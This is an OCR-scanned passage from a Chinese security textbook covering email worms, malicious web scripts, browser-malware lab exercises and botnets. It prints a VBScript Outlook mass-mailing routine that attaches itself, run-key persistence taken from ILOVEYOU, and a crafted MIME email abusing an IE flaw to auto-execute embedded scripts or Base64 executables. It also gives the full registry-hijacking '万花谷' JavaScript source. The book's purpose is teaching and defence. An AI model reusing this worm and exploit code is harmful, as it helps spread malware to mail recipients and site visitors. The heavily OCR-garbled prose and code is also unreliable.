Mail. Subject = "Betreff der E— Mail”" 
Mail. Body = "Text der E— Mail" 
Mail. Attachments. Add("C:\temp. vbs") 
Mail. Send 
Next 
ola.Quit 
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这 一 小 段 代码 的 功能 是 向 地 址 德 中 的 前 50 个 用 户 发 送 电子 邮件 ,并 将 脚本 自己 作为 附 
件 。 第 一 行 是 创建 一 个 Outlook 的 对 象 。 下面 是 一 个 循环 ,在 循环 中 不 断 地 向 地 址 短 中 的 
电子 邮件 地 址 发 送 内 容 相同 的 信件 。 

多 数 电子 邮件 型 恶意 代码 通过 修改 注册 表 等 信息 来 判断 各 种 条 件 及 取消 一 些 限 制 。 下 
面 的 代码 是 从 * 爱 虫 ” 中 取出 的 。 


On Error Resume Next 
// 调 整 脚本 语言 的 超时 设置 
dim wScr, IT 
set wscr = CreateObject("WScript. Shell") 
rr = wscr. RegRead( "HKEY CURRENT USER\Software\Microsoft\Windows Scripting Host\Settings\ 
Timeout") 
r=) en 
wscr. RegWrite "HKEY CURRENT USER\Software\Microsoft\Windows Scripting 
Host\Settings\Timeout", 0, "REG_DRORD" 
end if 
// 修 改 注册 表 , 使 得 每 次 系统 启动 时 自动 执行 脚本 
regcreate 
"HKEY_LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", dirsystem &"\ 
MSKernel32. vbs" 
regcreate "HKEY_LOCAL MACHINE\ Software\Microsoft\Windows\ CurrentVersion\ RunServices\ 
Win32DLL", dir wing"\Win32DLL. vbs" 
//MSKernel132, vbs 和 Win32DLL. vbs 是 病毒 脚本 的 一 个 副本 


从 上 面 可 以 看 出 ,其 实 写 一 个 通过 Outlook 传播 的 电子 邮件 恶意 代码 很 简单 ,但 是 它 作 
为 附件 传播 的 效率 可 能 就 会 打 些 折扣 。 下 面 的 一 种 方法 是 利用 IE 的 漏洞 编写 的 ,只 要 收 件 
人 的 输入 焦点 在 带 病毒 邮件 上 ,计算 机 就 会 被 感染 。 


From: "xxxxx" 

Subject: mail 

Date: Thu, 2 Nov 2000 13:27:33 + 0100 
MIME ~ Version: 1.0 

Content - Type: multipart/related; 
type = "multipart/alternative"; 
boundary= "1" 

X- Priority: 3 

X— MSMail ~ Priority: Normal 


a 
Content - Type: multipart/alternative; 
boundary= "2" 

Ss 


Content - Type: text/html; 

charset = "iso— 8859—1" 

Content ~ Transfer ~ Encoding: quoted - printable 

<HIML> 

<HEAD> 

</HEAD> 

< BODY bgColor = 3D# ffffff> 

< iframe src = 3Dcid:THE - CID height = 3D0 width = 3D0 ></iframe> 
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I will create the file C:\deleteme. txt <BR> 
</BODY> 
</HTML> 
EN 
二 本 


Content - Type: audio/x — wav; 

name = "hello. vbs" 

Content ~ Transfer — Encoding: quoted ~— printable 

Content ~ ID: <THE— CID> 

nert 

set objFileSystem = 3D CreateObject("Scripting. FileSystemObject") 
set objOutputFile = 3D objFileSystem. CreateTextFile("C:\deleteme. txt", 1) 
objOutputFile. writeline( "You can delete this file. ") 
objOutputFile. close 

msgbox "I have created the file : c:\deleteme. txt" 

==Insert—= 


上 面 的 这 个 例子 可 以 实现 只 要 将 焦点 移 到 邮件 主题 上 就 会 执行 这 个 脚本 。 因 此 这 一 漏 
洞 将 更 加 有 效 地 传播 电子 邮件 恶意 代码 。 产 生 上 面 这 个 漏洞 的 原因 是 采用 HTML 发 送 方 
式 对 背景 音乐 文件 没有 做 检查 ,导致 脚本 和 应 用 程序 等 被 执行 。 因 此 ,采用 不 同 的 编码 就 可 
以 将 脚本 、 命 令 行 命令 及 可 执行 文件 等 内 嵌 在 邮件 中 。 

其 中 ,name 一 "hello. vbs" 这 个 文件 名 可 以 任意 命名 。 

如 果 是 脚本 则 需要 vbs 扩展 名 ,如 果 是 命令 行 命令 则 应 该 是 bat 或 cmd 结尾 。 如 果 是 
脚本 或 文本 方式 的 命令 , 则 编码 方式 应 为 : 


Content - Transfer - Encoding: quoted - printable 


如 果 是 应 用 程序 则 文件 名 应 该 改 为 exe 扩展 名 : name 二 "hello. exe" 。 编 码 方式 应 该 改 
为 uuMime(base64) 编码 : 


Content - Transfer - Encoding: quoted - printable 


最 后 ,将 应 用 程序 进行 Base64 编码 插入 --insert -与 --insert -之 间 , 这 样 就 构造 好 了 一 
封 邮件 。 

根据 上 面 的 知识 ,可 以 先 写 一 个 应 用 程序 型 恶意 代码 ; 接着 对 恶意 代码 程序 进行 
Base64 编码 ; 然后 再 将 这 个 编码 嵌入 到 上 面 这 封 邮 件 中 ; 最 后 向 地 址 短 中 的 电子 邮件 地 址 
发 送 这 个 电子 邮件 。 当 收 到 邮件 的 用 户 把 输入 焦点 放 在 这 个 主题 上 时 ,这 个 恶意 代码 就 会 
在 没有 任何 提示 的 情况 下 立刻 被 执行 ,执行 的 结果 和 上 面 一 样 , 先 将 自身 编码 ,再 插 和 人 邮件 ， 
再 向 地 址 敌 中 的 电子 邮件 地 址 发 送 。 采 用 这 种 方式 ,恶意 代码 就 能 迅速 在 网 上 蔓延。 


9.2.3 邮件 型 恶意 代码 的 预防 


电子 邮件 是 网 民 的 重要 交流 途径 , 申 它 带 来 的 恶意 代码 如 何 防 范 ? 防范 和 处 理 带 病毒 
邮件 的 建议 包括 以 下 几 点 。 
(1) 不 要 轻易 打开 陌生 人 来 信 中 的 附件 文件 。 当 收 到 陌生 人 寄 来 的 一 些 自称 是 “不 可 
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不 看 ”的 有 趣 内 容 时 , 千 万 不 要 不 假 思 索 地 贸然 打开 它 ,尤其 对 于 一 些 EXE 之 类 的 可 执行 程 
序 文件 ,就 更 要 慎之 又 慎 。 

(2) 对 于 比较 熟悉 的 朋友 寄 来 的 信件 ,如 果 其 信 中 夹带 了 程序 附件 ,但 是 他 却 没有 在 信 
中 提 及 或 是 说 明 ,也 不 要 轻易 打开 。 因 为 可 能 有 些 亚 意 代码 是 偷偷 地 附着 上 去 的 一 一 也 许 
他 的 计算 机 已 经 染 毒 了 ,可 他 自己 却 不 知道 。“Happy 99” 就 是 这 样 的 恶意 代码 , 它 会 自我 复 
制 ,跟着 邮件 走 。 

(3) 切忌 盲目 转发 。 当 收 到 某 些 自 认 为 有 趣 的 邮件 时 ,有 些 人 还 来 不 及 细 看 就 打开 通 
信德 给 自己 的 每 一 位 朋友 都 转发 一 份 , 这 极 有 可 能 使 恶意 代码 制造 者 的 恶 行 得 件 , 而 你 的 朋 
友 对 你 发 来 的 信件 无 疑 是 不 会 产生 怀疑 的 ,结果 你 无 意 中 成 了 恶意 代码 传播 者 。 

(4) 去 掉 Windows 脚本 执行 功能 。 相 当 一 部 分 的 流行 网 络 蠕 虫 程序 是 利用 了 
Windows 的 脚本 语言 来 感染 计算 机 系统 的 。 为 了 避免 这 种 情况 的 发 生 ,可 将 该 功能 去 掉 
(执行 Windows 98 系统 下 的 “设置 ”控制 面板 ”添加 /删除 程序 ”一 “Windows 安装 程 
序 ”>“ 附 件 ” 一 Windows Scripting Host 命令 ,将 该 功能 去 掉 )。 该 功能 是 随 着 IE 5. 0 或 者 
操作 系统 直接 安装 到 系统 中 的 。 一 般 的 计算 机 系统 正常 运行 并 不 需要 该 功能 ,因此 可 以 删 
除 该 功能 ,如 果 需 要 可 以 随时 再 加 上 。 

在 Windows 2000 下 ,禁止 FileSystemObject 这 个 对 象 就 可 以 很 有 效 地 控制 这 种 恶意 
代码 的 传播 。 下 面 的 这 条 命令 可 以 禁止 文件 系统 对 象 : 


regsvr32 scrrun.dll /u 


人 警告 如 采 在 使 用 DotNet 进行 Web 应 用 程序 开发 ,请 不 要 使 用 该 方法 。 它 会 影响 其 
他 程序 的 运行 。 

这 样 做 的 结果 是 扩展 名 称 为 vbs 的 文件 不 能 自动 运行 ,在 一 定 程度 上 避免 了 流行 恶意 
代码 的 传播 。 

(5) 对 于 利用 文件 的 扩展 名 做 文章 的 恶意 代码 ,不 要 隐藏 系统 中 已 知 文件 类 型 的 扩展 
名 称 。Windows 操作 系统 默认 的 是 “隐藏 已 知 文件 类 型 的 扩展 名 称 ”。 用 户 可 以 改 为 显示 
所 有 文件 类 型 的 扩展 名 称 。 当 然 Windows 系统 下 对 于 一 些 特别 的 文件 的 扩展 名 (如 “垃圾 
虫 ”(Scrapworm) 利 用 的 shs 扩展 名 称 ) ,即使 修改 了 系统 设置 还 是 不 能 显示 其 扩展 名 称 。 
(6) 将 系统 的 网 络 连 接 安 全 级 别 至 少 设置 为 “中 等 ”, 它 可 以 在 一 定 程度 上 预防 某 些 有 
害 的 Java 程序 或 者 某 些 ActiveX 组 件 对 计算 机 的 侵害 。“ 控 制 面板 ”中 的 Internet 项 目 中 
有 “安全 ”标签 ,会 出 现 Internet 项 的 安全 级 别 设置 窗口 ,在 其 中 可 以 进行 级 别 设置 。 

(7) 利用 工具 。 可 用 的 工具 软件 有 很 多 ,如 360“ 卡 巴 斯 基 “瑞星 ”“ 诺 顿 " 等 杀毒 工具 
都 具有 监控 邮箱 的 功能 。 


9.3 ” WebPage 中 的 恶意 代码 


WebPage 中 的 恶意 代码 主要 是 指 某 些 网 站 使 用 的 恶意 代码 。 这 些 代 码 打 着 给 用 户 加 
深 “ 印 象 " 和 提供 “方便 ”的 旗号 做 令 人 厌恶 的 事情 。 例 如 ,有 些 网 站 修改 IE 浏览 器 设置 ,使 
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用 户 默认 连接 该 网 站 等 。 虽然 有 些 网 站 可 能 是 出 于 善意 ,但 是 过 分 地 使 用 就 会 扰乱 用 户 正 
常 使 用 计算 机 ,这 就 理所当然 成 为 恶意 代码 了 。 


9.3.1 脚本 病毒 的 基本 类 型 


1. 基于 JavaScript 的 恶意 脚本 

使 用 JavaScript 语言 编写 的 恶意 代码 主要 运行 在 IE 浏览 器 环境 中 ,可 以 对 浏览 器 的 设 
置 进行 修改 ,主要 破坏 是 对 注册 表 的 修改 ,危害 不 是 很 大 。 

2. 基于 VBScript 的 恶意 脚本 

使 用 VBScript 语言 的 恶意 代码 可 以 在 浏览 器 中 和 运行。 更 重要 的 是 : 这 种 恶意 代码 和 
普通 的 宏 病 毒 并 没有 非常 清晰 的 界限 ,可 以 在 Office, 主 要 是 浏览 器 .Outlook 中 运行 ,可 以 
执行 的 操作 非常 多 ,甚至 可 以 修改 硬盘 上 的 文件 ,删除 文件 和 执行 程序 等 ,危害 非常 大 。 

3. 基于 PHP 的 恶意 脚本 

基于 PHP 的 恶意 脚本 是 新 的 恶意 代码 类 型 ,感染 PHP 脚本 文件 ,主要 对 服务 器 造成 
影响 ,对 个 人 计算 机 影响 不 大 ,目前 仅 有 一 个 “新 世界 ”(NewWorld) 恶 意 代 码 , 但 它 并 没有 
造成 很 大 的 破坏 ,但 是 前 景 难以 估计 ,如 果 PHP 得 到 更 加 广泛 的 使 用 ,这 种 病毒 将 成 为 真 
正 的 威胁 。 

4. Shell 恶意 脚本 

编写 Shell 恶意 脚本 是 一 种 制造 Linux 恶意 代码 的 简单 方法 。 在 UNIX 1989 卷 2 上 便 
可 以 看 到 Tom Duff 和 M. Douglas Mcllroy 编写 的 脚本 恶意 代码 。Shell 恶意 脚本 的 危害 
性 不 会 很 大 ,并 且 它 本 身 极 易 被 发 现 ,因为 它 是 以 明文 方式 编写 并 执行 的 。 但 通常 一 个 用 户 
会 深信 不 疑 地 去 执行 任何 脚本 ,而 且 不 会 过 问 该 脚本 的 由 来 ,这 样 ,这 些 用 户 便 成 为 攻击 的 
目标 了 。 


9.3.2 Web 恶意 代码 的 工作 机 制 


本 节 主 要 介绍 恶意 代码 中 的 一 种 一 一 在 网 页 中 用 脚本 实现 的 恶意 代码 。 由 于 因特网 用 
户 经 常 使 用 浏览 器 浏览 网 页 ,因此 给 这 种 恶意 代码 的 发 作 造成 了 便利 环境 “万 花 谷 就 是 
其 中 一 种 。 如 果 在 因特网 上 看 到 一 个 美丽 诱 人 的 网 址 “万 花 谷 ”, 请 不 要 轻易 碰 它 ,这 实际 是 
一 个 恶意 “陷阱 ”"。 如 果 经 不 住 诱 惑 ,只 要 用 鼠标 轻 轻 一 点 ,你 的 计算 机 就 立即 瘫痪 了 。 这 就 
是 著名 的 “万 花 谷 ”, 它 是 利用 JavaScript 技术 进行 破坏 的 一 个 恶意 网 址 。 感 染 了 该 恶意 代 
码 后 的 特征 如 下 。 

(1) 不 能 正常 使 用 Windows 的 DOS 功能 程序 。 

(2) 不 能 正常 退出 Windows。 

(3)“ 开 始 ” 菜 单 上 的 “关闭 ”运行 ”等 栏目 被 屏蔽 ,禁止 重新 以 DOS 方式 启动 ,关闭 
DOS 命令 和 Regedit 命令 等 。 

(4) 将 正 浏 览 器 的 首页 和 收藏 夹 中 都 加 入 了 含有 该 有 害 网 页 代码 的 网 络 地 址 (网 络 地 
址 是 www. on888. xxx. xxx. com) 。 

(5) 在 IE 的 收藏 夹 中 自动 加 上 “万 花 谷 ”的 快捷 方式 ,网 络 地 址 是 http://96xx. 


XXX. COm。 
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从 恶意 代码 的 源 代码 来 看 ,万 花 谷 ”并 不 是 一 个 真正 意义 上 的 恶意 代码 ,因为 除了 一 些 
简单 的 破坏 作用 之 外 , 它 不 具有 恶意 代码 的 其 他 特征 (如 传播 性 )。“ 万 花 谷 ” 是 嵌 在 HTML 
网 页 中 的 一 段 Java 脚本 程序 , 它 最 初出 现在 http://on888. home. chinaren. com 个 人 网 站 
上 ,随后 ,其 他 一 些 个 人 主页 也 被 感染 了 该 恶意 代码 。 与 普通 恶意 脚本 有 所 不 同 的 是 : 用 
“查看 源 文件 ”方法 来 查看 感染 “万 花 谷 ”的 网 页 代码 时 ,只 能 看 到 一 大 段 杂 乱 字 符 。 原 因 是 
为 了 具有 隐蔽 性 ,该 恶意 代码 采用 了 JavaScript 的 escape() 函 数 进行 了 字符 处 理 ,把 某 些 符 
号 、 汉 字 等 变 成 乱码 以 达到 迷惑 人 的 目的 。 程 序 运行 时 青 调用 unescape() 解 码 到 本 地 计算 
机 上 运行 。 

恶意 代码 利用 了 下 面 这 段 JavaScript 代码 修改 了 HKLM\ Software\ Microsoft\ 
Internet Explorer\ Main\ 和 HKCU\ Software\ Microsoft\ Internet Explorer\ Main\ 中 的 
Window Title 这 个 键 的 值 。 同 时 ,还 修改 了 用 户 的 许多 IE 设置 ,如 消除 “运行 "按钮 .消除 
“关闭 ”按钮 消除 “注销 ”按钮 隐藏 桌面 .隐藏 盘 符 及 禁用 注册 表 等 。 以 下 就 是 这 个 恶意 代 
码 的 源 代码 。 


document. write(""); 

// 该 函数 是 先 在 收藏 夹 里 增加 一 个 站 点 

function AddFavLnk( loc, DispName, SiteURL) 

{ 

var Shor = Shl. CreateShortcut(loc + "\\" + DispName +",URL"); 
Shor. TargetPath = SiteURL; 

Shor. Save( ); 


} 

// 该 函数 是 病毒 的 主 函数 ,实现 COOKIES 检查 ,注册 表 修改 等 
function f(){ 

try 


{ 
// 声 明 一 个 RctiveX 对 象 
RctiveX initialization 
al = document. applets[0]; 
al. setCLSID("{F935DC22 - 1CF0 - 11D0 - ADB9 - 00C04FD58A0B}" ); 
// 创 建 几 个 实例 
al.createInstance( ); 
Shl =al.GetObject(); 
al. setCLSID("{0D43FE01 ~ F093 — 11CF ~ 8940 ~ 00A0C9054228}"); 
al.createInstance( ); 
FSO = al. GetObject(); 
al. setCLSID("{F935DC26 - 1CF0 ~ 11D0 ~ ADB9 - 00C04FD58A0B}"); 
al.createInstance( ); 
Net =al.GetObject(); 
try 
{ 
if (documents .cookies. indexOf ("Chg") == 一 1) 
上 
// 设 置 王 起 始 页 
Sh1. RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"， 
"http://www. on888. home. chinaren. com/" ) 
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// 设 置 COOKIES 
var expdate = new Date( (new Date( ) ) . getTime() + (1)); 
documents . cookies = "Chg = general; expires =" + expdate.toGMTString() + "; path=/;" 
// 消 除 RUN 按钮 
Sh]l. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoRun", 01, "REG BINARY"); 
// 消 除 "关闭 "按钮 
Sh]l. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoClose", 01, "REG BINARY"); 
// 消 除 "注销 "按钮 
Sh]. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoLogOff", 01, "REG_BINARY"); 
// 隐 藏 盘 符 
Sh]l. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\Explorer\\NoDrives", "63000000", "REG DWORD"); 
// 禁 用 注册 表 
Sh]l. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\System\\DisableRegistryTools", "00000001", "REG_DWORD"); 
// 禁 止 运行 DOS 程序 
Shl. RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\WinOldApp\\Disabled", "00000001", "REG_DWORD"); 
// 禁 止 进入 DOS 模式 

Sh1.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies 
\\WinOldApp\\NoRealMode", "00000001", "REG_ DWORD"); 
// 开 机 提示 窗口 标题 
Sh]. RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon 
\\LegalNoticeCaption", "你 已 经 中 毒 …"); 
// 开 机 提示 窗口 信息 
Sh]. RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon 
\\LegalNoticeText"," 你 已 经 中 毒 …"); 
// 设 置 王 标 题 
Sh]l. RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title"， 
"你 已 经 中 毒 …"); 
Sh]l. RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title"， 
"你 已 经 中 毒 …"); 


catch(e) 
} 


catch(e) 
上 


// 初 始 化 函数 


function init() 


setTimeout("f()", 1000); 


// 开 始 执行 


init(); 


第 9 章 其 他 恶意 代码 239 


9.3.3 ”Web 恶意 代码 实验 


实验 一 

【实验 目的 】 

掌握 网 页 恶意 代码 的 基本 原理 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) IE 浏览 器 。 

【实验 步骤 】 

(1) 从 光盘 上 复制 实验 文件 到 实验 的 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 
\Experiment\IEMalware \1. html) 。 

(2) 用 IE 打开 该 文件 ,IE 不 断 地 打开 163 网 页 。 

(3) 如 果 I 正 阻止 了 显示 内 容 , 右 击 出 现 的 提示 信息 ,在 弹出 的 快捷 菜单 中 选择 “允许 阻 
止 的 内 容 ? 命 令 ,就 可 以 看 到 实验 现象 。 

【程序 源码 】 

本 书 配套 素材 目录 \Experiment\IEMalware\1. html。 

实验 二 

【实验 目的 】 

掌握 网 页 恶意 代码 的 基本 原理 。 

【实验 环境 】 

(1) Windows XP 操作 系统 。 

(2) IE 浏览 器 。 

【实验 步骤 】 

(1) 从 光盘 上 复制 实验 文件 到 实验 计算 机 上 (源码 位 置 : 本 书 配套 素材 目录 
\Experiment\IE Malware \2. html) 。 

(2) IE 显示 的 地 方 出 现 黑白 颜色 不 断 地 闪 动 。 

(3) 如 果 IE 阻止 了 显示 内 容 , 右 击 出 现 的 提示 信息 ,在 弹出 的 快捷 菜单 中 选择 “允许 阻 
止 的 内 容 ” 命 令 ,就 可 以 看 到 实验 现象 。 

【程序 源码 】 

参见 本 书 配 套 素材 目录 \Experiment\IEMalware\2. html。 


9.4 僵尸 网 络 


在 我 国 的 湖南 西部 有 神秘 莫 测 的 赶 尸 传说 , 即 湘西 赶 尸 。 湘 西 赶 尸 也 许 是 一 种 神秘 的 
巫 术 ,也 许 是 恩 邢 人 的 一 种 迷信 ,也 许 只 是 为 了 骗取 钱财 的 把 戏 , 也 许 仅仅 是 一 种 答 人 听闻 
的 传闻 。 但 在 计算 机 领域 ,僵尸 网 络 是 确实 存在 的 。 

在 僵尸 网 络 中 ,众多 被 人 侵 的 计算 机 像 僵 尸 群 一 样 被 人 驱赶 和 指挥 着 ,成 为 被 人 利用 的 
一 种 工具 。2016 年 爆发 的 Mirai 是 近年 来 比较 有 名 的 僵尸 病毒 。Mirai 可 以 高 效 扫描 物 联 
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网 系统 设备 ,感染 采用 出 厂 密码 设置 或 弱 密 码 加 密 的 脆弱 物 联 网 设备 ,被 病毒 感染 后 ,设备 
成 为 僵尸 网 络 机 器 人 后 在 黑客 命令 下 发 动 高 强度 僵尸 网 络 攻击 。 

1. 僵尸 网 络 的 概念 

僵尸 网 络 (Botnet) 是 指控 制 者 采用 一 种 或 多 种 传播 手段 ,将 Bot 程序 (僵尸 程序 ) 传 播 
给 大 批 计算 机 ,从 而 在 控制 者 和 被 感染 计算 机 之 间 所 形成 的 一 个 可 一 对 多 控制 的 网 络 。 控 
制 者 通过 各 种 途径 传播 僵尸 程序 并 感染 互联 网 上 的 大 量 主机 ,而 被 感染 的 主机 将 通过 一 个 
控制 信道 接收 控制 者 的 指令 ,并 执行 该 指令 。 

在 僵尸 网 络 领域 ,Bot 是 Robot 的 缩写 ,是 指 实 现 恶 意 控制 功能 的 程序 代码 ;“ 僵 尸 计 
算 机 ?就 是 被 植 人 了 Bot 程序 的 计算 机 ;“ 控 制服 务 器 (Control Server) 是 指控 制 和 通信 的 
中 心服 务 器 ,在 基于 IRC(Internet Relay Chat,IRC) 协 议 进行 控制 的 僵尸 网 络 中 ,就 是 指 提 
供 IRC 聊天 服务 的 服务 器 。 

僵尸 网 络 是 互联 网 上 被 攻击 者 集中 控制 的 一 群 计算 机 。 攻 击 者 可 以 利用 僵尸 网 络 发 起 
大 规模 的 网 络 攻击 ,如 DDoS ,海量 垃圾 邮件 等 。 此 外 ,僵尸 计算 机 所 保存 的 信息 ,如 银行 账 
号 和 口令 等 也 都 可 被 控制 者 轻松 获得 。 因 此 ,不 论 是 对 网 络 安 全 还 是 对 用 户 数据 安全 来 说 ， 
伪 尸 网 络 都 是 极 具 威胁 的 恶意 代码 。 伪 尸 网 络 也 因此 成 为 目前 国际 上 十 分 关注 的 安全 问 
题 。 然 而 ,发 现 一 个 僵尸 网 络 是 非常 困难 的 ,因为 黑客 通常 远程 .隐蔽 地 控制 分 散在 网 络 上 
的 僵尸 计算 机 ,这 些 计算 机 的 用 户 往往 并 不 知情 。 因 此 ,僵尸 网 络 是 目前 互联 网 上 最 受 黑客 
青睐 的 工具 。 

2. 僵尸 网 络 的 特点 

僵尸 网 络 主要 具有 以 下 特点 。 

(1) 分 布 性 。 伪 尸 网 络 是 一 个 具有 一 定 分 布 性 的 ,逻辑 的 网 络 , 它 不 具有 物理 拓扑 结 
构 。 随 着 Bot 程序 的 不 断 传 播 而 不 断 有 新 的 僵尸 计算 机 添加 到 这 个 网 络 中 来 。 

(2) 恶意 传播 。 僵 尸 网 络 是 采用 了 一 定 的 恶意 传播 手段 形成 的 ,如 主动 漏洞 攻击 .恶意 
邮件 等 各 种 传播 手段 ,都 可 以 用 来 进行 Bot 程序 的 传播 。 

(3) 一 对 多 控制 。Botnet 的 最 主要 的 特点 就 是 可 以 一 对 多 地 进行 控制 ,传达 命令 并 执 
行 相同 的 恶意 行为 ,如 DDoS 攻击 等 。 这 种 一 对 多 的 控制 关系 使 得 攻击 者 能 够 以 低廉 的 代 
价 高 效 地 控制 大 量 的 资源 为 其 服务 ,这 也 是 Botnet 攻击 受到 黑客 青睐 的 根本 原因 。 

3. 僵尸 网 络 的 发 展 过 程 

在 早期 的 IRC 聊天 网 络 中 ,防止 频道 被 滥用 、 管 理 权限 .记录 频道 事件 等 一 系列 功能 都 
可 以 由 管理 者 编写 的 智能 程序 所 完成 。 于 是 在 1993 年 ,在 IRC 聊天 网 络 中 出 现 了 一 款 Bot 
工具 (Eggdrop)。Eggdrop 是 第 一 个 Bot 程序 ,能 够 帮助 用 户 方便 地 使 用 IRC 聊天 网 络 。 
尽管 Eggdrop 的 功能 是 良性 的 ,然而 黑客 学 习 并 利用 这 个 设计 思路 编写 出 了 带 有 恶意 行为 
的 Bot 工具 ,开始 对 大 量 的 受害 主机 进行 控制 ,利用 它们 的 资源 以 达到 恶意 攻击 的 目标 。 

20 世纪 90 年 代 末 , 随 着 DDoS 的 成 熟 , 出 现 了 大 量 分 布 式 拒绝 服务 攻击 工具 (如 TFN、 
TFN2K 和 Trinoo 等 )。 攻 击 者 利用 这 些 工具 控制 大 量 的 被 感染 主机 ,发 动 DDoS 攻击 。 而 
这 些 被 控 主机 从 一 定 意义 上 来 说 已 经 具有 了 Botnet 的 雏形 。 

1999 年 ,在 第 八 届 DEFCON 年 会 上 发 布 的 SubSeven 2. 1 版 开始 使 用 IRC 协议 构建 攻 
击 者 对 僵尸 主机 的 控制 信道 ,也 成 为 第 一 个 真正 意义 上 的 Bot 程序 。 随 后 基于 IRC 协议 的 
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Bot 程序 的 大 量 出 现 ( 如 GTBot、Sdbot 等 ) ,使 得 基于 IRC 协议 的 Botnet 成 为 主流 。 

2003 年 之 后 , 随 着 蠕虫 技术 的 不 断 成 熟 , Bot 的 传播 开始 使 用 蠕虫 的 主动 传播 技术 ,从 
而 能 够 快速 构建 大 规模 的 Botnet。 其 中 ,著名 的 僵尸 网 络 有 2004 年 爆发 的 Agobot/Gaobot 
和 rBot/Spybot。 同 年 出 现 的 Phatbot 则 在 Agobot 的 基础 上 ,开始 独立 使 用 P2P 结构 构建 
控制 信道 。 

从 良性 Bot 的 出 现 到 恶意 Bot 的 实现 ,从 被 动 传播 到 利用 蠕虫 技术 主动 传播 ,从 使 用 简 
单 的 IRC 协议 构成 控制 信道 到 构建 复杂 多 变 P2P 结构 的 控制 模式 ,Botnet 逐渐 发 展 成 规模 
庞大 、 功 能 多 样 ,不易 检 测 的 恶意 网 络 ,给 当前 的 网 络 安全 带 来 了 不 容 忽视 的 威胁 。 

4. 僵尸 网 络 的 工作 过 程 

一 般 而 言 ,Botnet 的 工作 过 程 包括 传播 .加 入 和 控制 3 个 阶段 。 

1) 传播 阶段 

在 传播 阶段 ,Botnet 把 Bot 程序 传播 到 尽 可 能 多 的 主机 上 去 。Botnet 需要 的 是 具有 一 
定 规模 的 被 控 计 算 机 ,而 这 个 规模 是 随 着 Bot 程序 的 扩散 而 形成 的 。 在 这 个 传播 过 程 中 有 
如 下 几 种 手段 。 

(1) 即时 通信 软件 。 利 用 即时 通信 软件 向 好 友 列 表 发 送 执行 僵尸 程序 的 链接 ,并 通过 
社会 工程 学 技巧 诱骗 其 点 击 , 从 而 进行 感染 。 例 如 2005 年 初 爆发 的 “MSN 人 性感 鸡 ” 
(Worm. MSNLoveme.b) 采 用 的 就 是 这 种 方式 。 

(2) 邮件 型 恶意 代码 。Bot 程序 还 会 通过 发 送 大 量 的 邮件 型 恶意 代码 传播 自身 ,通常 
表现 为 在 邮件 附件 中 携带 僵尸 程序 及 在 邮件 内 容 中 包含 下 载 执行 Bot 程序 的 链接 ,并 通过 
一 系列 社会 工程 学 的 技巧 诱 使 接收 者 执行 附件 或 打开 链接 ,或 者 是 通过 利用 邮件 客户 端的 
漏洞 自动 执行 ,从 而 使 得 接收 者 主机 被 感染 成 为 僵尸 主机 。 

(3) 主动 攻击 漏洞 。 其 原理 是 通过 攻击 目标 系统 所 存在 的 漏洞 获得 访问 权 , 并 在 
Shellcode 执行 Bot 程序 注入 代码 ,将 被 攻击 系统 感染 成 为 僵尸 主机 。 属 于 此 类 的 最 基本 的 
感染 途径 是 攻击 者 手动 地 利用 一 系列 黑客 工具 和 脚本 进行 攻击 ,获得 权限 后 下 载 Bot 程序 
执行 。 攻 击 者 还 会 将 僵尸 程序 和 蠕虫 技术 进行 结合 ,从 而 使 Bot 程序 能 够 进行 自动 传播 , 著 
名 的 Bot 样本 Agobot, 就 实现 了 Bot 程序 的 自动 传播 。 

(4) 恶意 网 站 脚本 。 攻 击 者 在 提供 Web 服务 的 网 站 中 在 HTML 页 面 上 绑 定 恶 意 的 脚 
本 , 当 访 问 者 访问 这 些 网 站 时 就 会 执行 恶意 脚本 ,使 得 Bot 程序 下 载 到 主机 上 ,并 被 自动 执行 。 

(5) 特洛伊 木马 。 伪 装 成 有 用 的 软件 ,在 网 站 、FTP 服务 器 、P2P 网 络 中 提供 ,诱骗 用 户 
下 载 并 执行 。 

通过 以 上 几 种 传播 手段 可 以 看 出 ,在 Botnet 的 形成 过 程 中 ,其 传播 方式 与 蠕虫 及 功能 
复杂 的 间谍 软件 很 相近 。 

2) 加 入 阶段 

在 加 入 阶段 ,每 一 台 被 感染 主机 都 会 随 着 隐藏 在 自身 上 的 Bot 程序 的 发 作 而 加 入 到 
Botnet 中 去 ,加 入 的 方式 根据 控制 方式 和 通信 协议 的 不 同 而 有 所 不 同 。 在 基于 IRC 协议 的 
Botnet 中 ,感染 Bot 程序 的 主机 会 登录 到 指定 的 服务 器 和 频道 中 去 ,在 登录 成 功 后 ,在 频道 
中 等 待 控制 者 发 来 的 恶意 指令 。 

3) 控制 阶段 

在 控制 阶段 ,攻击 者 通过 中 心服 务 器 发 送 预先 定义 好 的 控制 指令 ,让 僵尸 计算 机 执行 恶 
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意 行 为 。 典 型 的 恶意 行为 是 发 起 DDoS 攻击 、 窃 取 主 机 敏感 信息 .升级 恶意 程序 等 。 

5. 僵尸 网 络 的 分 类 

Botnet 根据 分 类 标准 的 不 同 ,可 以 有 许多 种 分 类 方法 ,分 别 描述 如 下 。 

1) 按 Bot 程序 的 种 类 分 类 

(1) Agobot/Phatbot/Forbot/XtremBot。 这 些 是 最 著名 的 僵尸 工具 。 防 病毒 厂商 
Spphos 列 出 了 超过 500 种 已 知 的 不 同 版 本 的 Agobot。Agobot 最 新 版 本 的 代码 采用 C++ 编 
